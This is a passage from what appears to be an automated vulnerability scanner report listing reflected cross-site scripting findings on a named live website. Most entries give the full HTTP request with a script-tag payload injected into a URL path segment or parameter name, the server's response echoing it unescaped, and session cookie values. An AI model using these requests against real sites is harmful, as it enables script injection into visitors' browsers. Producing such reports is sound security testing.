Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search&opt=2&9182e<script>alert(1)</script>8ac9655e9ab=1 was not found on this server.</p>
...[SNIP]...

2.1580. http://www.resellerbase.com/detail/19/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8c2d0<a>b283daee4b6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=28c2d0<a>b283daee4b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search&opt=28c2d0<a>b283daee4b6 was not found on this server.</p>
...[SNIP]...

2.1581. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d603<script>alert(1)</script>9ab43a9f884 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8d603<script>alert(1)</script>9ab43a9f884/19/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8d603<script>alert(1)</script>9ab43a9f884/19/themes/ was not found on this server.</p>
...[SNIP]...

2.1582. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a0f7<script>alert(1)</script>15f5870b9c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/195a0f7<script>alert(1)</script>15f5870b9c3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/195a0f7<script>alert(1)</script>15f5870b9c3/themes/ was not found on this server.</p>
...[SNIP]...

2.1583. http://www.resellerbase.com/detail/19/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 212a5<script>alert(1)</script>81d21b618cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes212a5<script>alert(1)</script>81d21b618cb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes212a5<script>alert(1)</script>81d21b618cb/ was not found on this server.</p>
...[SNIP]...

2.1584. http://www.resellerbase.com/detail/19/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9329c<script>alert(1)</script>994e169f894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/?9329c<script>alert(1)</script>994e169f894=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1585. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa27b<script>alert(1)</script>eb1eefda010 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa27b<script>alert(1)</script>eb1eefda010/19/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa27b<script>alert(1)</script>eb1eefda010/19/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1586. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb02c<script>alert(1)</script>40c83273e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19eb02c<script>alert(1)</script>40c83273e37/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19eb02c<script>alert(1)</script>40c83273e37/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1587. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87035<script>alert(1)</script>1485d3aae82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes87035<script>alert(1)</script>1485d3aae82/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes87035<script>alert(1)</script>1485d3aae82/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1588. http://www.resellerbase.com/detail/19/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f2d9<script>alert(1)</script>6a079f60aea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos6f2d9<script>alert(1)</script>6a079f60aea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos6f2d9<script>alert(1)</script>6a079f60aea/ was not found on this server.</p>
...[SNIP]...

2.1589. http://www.resellerbase.com/detail/19/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef645<script>alert(1)</script>e2a4a97ce76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/?ef645<script>alert(1)</script>e2a4a97ce76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1590. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42f61<script>alert(1)</script>311ec053aa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail42f61<script>alert(1)</script>311ec053aa7/19/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail42f61<script>alert(1)</script>311ec053aa7/19/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1591. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff751<script>alert(1)</script>99552c999a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19ff751<script>alert(1)</script>99552c999a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19ff751<script>alert(1)</script>99552c999a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1592. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb840<script>alert(1)</script>12874e16b17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themeseb840<script>alert(1)</script>12874e16b17/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themeseb840<script>alert(1)</script>12874e16b17/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1593. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6e8ce<script>alert(1)</script>5a1e02625ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos6e8ce<script>alert(1)</script>5a1e02625ce/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos6e8ce<script>alert(1)</script>5a1e02625ce/images/ was not found on this server.</p>
...[SNIP]...

2.1594. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 652ff<script>alert(1)</script>206f6a15795 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images652ff<script>alert(1)</script>206f6a15795/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images652ff<script>alert(1)</script>206f6a15795/ was not found on this server.</p>
...[SNIP]...

2.1595. http://www.resellerbase.com/detail/19/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45bdf<script>alert(1)</script>1f4486cca85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/?45bdf<script>alert(1)</script>1f4486cca85=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/?45bdf<script>alert(1)</script>1f4486cca85=1 was not found on this server.</p>
...[SNIP]...

2.1596. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17275<script>alert(1)</script>3a6e50aab3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17275<script>alert(1)</script>3a6e50aab3e/19/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17275<script>alert(1)</script>3a6e50aab3e/19/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1597. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a03b5<script>alert(1)</script>136766a3df9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19a03b5<script>alert(1)</script>136766a3df9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19a03b5<script>alert(1)</script>136766a3df9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1598. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eccb<script>alert(1)</script>efd424565b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes9eccb<script>alert(1)</script>efd424565b3/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes9eccb<script>alert(1)</script>efd424565b3/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1599. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb3cb<script>alert(1)</script>da3acd5b13e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmoscb3cb<script>alert(1)</script>da3acd5b13e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmoscb3cb<script>alert(1)</script>da3acd5b13e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1600. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 82e88<script>alert(1)</script>5f04879472 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

